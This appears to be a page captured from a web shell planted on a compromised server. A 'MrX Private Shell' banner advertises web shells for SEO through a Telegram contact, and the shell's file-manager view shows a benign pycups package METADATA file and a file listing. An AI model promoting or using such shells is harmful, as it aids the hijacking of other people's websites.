__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
Metadata-Version: 2.2 Name: pycups Version: 2.0.4 Summary: Python bindings for libcups Home-page: https://github.com/OpenPrinting/pycups Download-URL: https://github.com/OpenPrinting/pycups/releases Maintainer: Zdenek Dohnal Maintainer-email: [email protected] License: GPLv2+ Classifier: Intended Audience :: Developers Classifier: Topic :: Software Development :: Libraries :: Python Modules Classifier: License :: OSI Approved :: GNU General Public License (GPL) Classifier: Development Status :: 5 - Production/Stable Classifier: Operating System :: Unix Classifier: Programming Language :: C Classifier: Programming Language :: Python Classifier: Programming Language :: Python :: 3 License-File: COPYING Dynamic: classifier Dynamic: description Dynamic: download-url Dynamic: home-page Dynamic: license Dynamic: maintainer Dynamic: maintainer-email Dynamic: summary This is a set of Python bindings for the libcups library from the CUPS project. >>> # Example of getting a list of printers >>> import cups >>> conn = cups.Connection () >>> printers = conn.getPrinters () >>> for printer in printers: ... print printer, printers[printer]["device-uri"] ... HP ipp://192.168.1.1:631/printers/HP duplex ipp://192.168.1.1:631/printers/duplex HP-LaserJet-6MP ipp://192.168.1.1:631/printers/HP-LaserJet-6MP EPSON-Stylus-D78 usb://EPSON/Stylus%20D78
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| INSTALLER | File | 7 B | 0644 |
|
| METADATA | File | 1.33 KB | 0644 |
|
| WHEEL | File | 104 B | 0644 |
|
| top_level.txt | File | 5 B | 0644 |
|